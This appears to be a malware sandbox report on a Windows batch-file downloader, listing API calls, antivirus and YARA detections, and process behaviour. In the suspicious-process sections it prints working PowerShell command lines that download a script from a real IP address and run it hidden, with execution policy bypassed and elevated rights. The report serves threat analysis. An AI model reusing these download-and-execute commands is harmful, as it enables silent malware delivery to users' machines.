NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b9d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b9e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 14, 2024, 5:45 p.m.	process_identifier: 2780 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b9f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (1 event)

file	C:\Users\Public\Documents\29389023.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (4 events)

cmdline	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1
cmdline	powershell -command "Invoke-WebRequest -Uri 'http://64.94.84.206/plug3.ps1' -OutFile 'C:\Users\Public\Documents\chrome.ps1'"
cmdline	powershell -Command "Start-Process 'powershell.exe' -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Public\Documents\chrome.ps1""' -Verb RunAs"
cmdline	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW Aug. 14, 2024, 5:45 p.m.	thread_identifier: 2876 thread_handle: 0x0000008c process_identifier: 2872 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: powershell -Command "Start-Process 'powershell.exe' -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Public\Documents\chrome.ps1""' -Verb RunAs" filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x00000084	1	1	0
CreateProcessInternalW Aug. 14, 2024, 5:45 p.m.	thread_identifier: 2960 thread_handle: 0x000004e0 process_identifier: 2956 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1 filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000004d8	1	1	0

File has been identified by 2 AntiVirus engines on VirusTotal as malicious (2 events)

Symantec	ISB.Downloader!gen73
huorong	HEUR:TrojanDownloader/PS.NetLoader.ae

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW Aug. 14, 2024, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 14, 2024, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW Aug. 14, 2024, 5:45 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

powershell -Command "Start-Process 'powershell.exe' -ArgumentList '-WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File ""C:\Users\Public\Documents\chrome.ps1""' -Verb RunAs"

Drops a binary and executes it (1 event)

file	C:\Users\Public\Documents\29389023.bat

Creates a slightly modified copy of itself (1 event)

description

Possibly a polymorphic version of itself

file

{u'yara': [{u'strings': [u'cnNoZWxsLmV4ZQ=='], u'meta': {u'source': u"Metasploit's killav.rb script", u'description': u'Contains references to security software', u'author': u'Jerome Athias'}, u'name': u'Antivirus', u'offsets': {u'a413': [[226L, 0]]}}], u'sha1': u'758287be70e1a3ed068cc63dcad3a8869733ccc5', u'name': u'c3c792274c284d69_29389023.bat', u'filepath': u'C:\\Users\\Public\\Documents\\29389023.bat', u'sha512': u'12c4ee7ef3c302c93eeec1cbeeadeedd76cc16670d07abfe707b3e0afbdf5600768e0ffbe36491c549f35a36b642e77b02666ddea32478f7f5fd7af77d1977cd', u'urls': [u'http://64.94.84.206/plug3.ps1'], u'crc32': u'9EC3EA46', u'path': u'/home/cuckoo/.cuckoo/storage/analyses/52844/files/c3c792274c284d69_29389023.bat', u'ssdeep': u'6:02VwuInC1X98GSLh8JJwFcUhO95IAuaH9dCE9AUj98q0MFCsnfSTFGqR3KIIYAG9:u1nC1X98pG3wFcUhO959pd998XM4snfY', u'sha256': u'c3c792274c284d69c46c76702ce71cd1aab014c4b00f1a522f23bb26775f73a0', u'type': u'ASCII text, with CRLF line terminators', u'pids': [2552], u'md5': u'd22dba176827d51404e336cadf6bb276', u'size': 372}

One or more non-whitelisted processes were created (4 events)

parent_process	powershell.exe	martian_process	C:\Users\Public\Documents\29389023.bat
parent_process	powershell.exe	martian_process	"C:\Users\Public\Documents\29389023.bat"
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1
parent_process	powershell.exe	martian_process	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Public\Documents\chrome.ps1

Creates a suspicious Powershell process (9 events)

option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window
option	-executionpolicy bypass	value	Attempts to bypass execution policy
option	-noprofile	value	Does not load current user profile
option	-windowstyle hidden	value	Attempts to execute command with a hidden window

uno.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All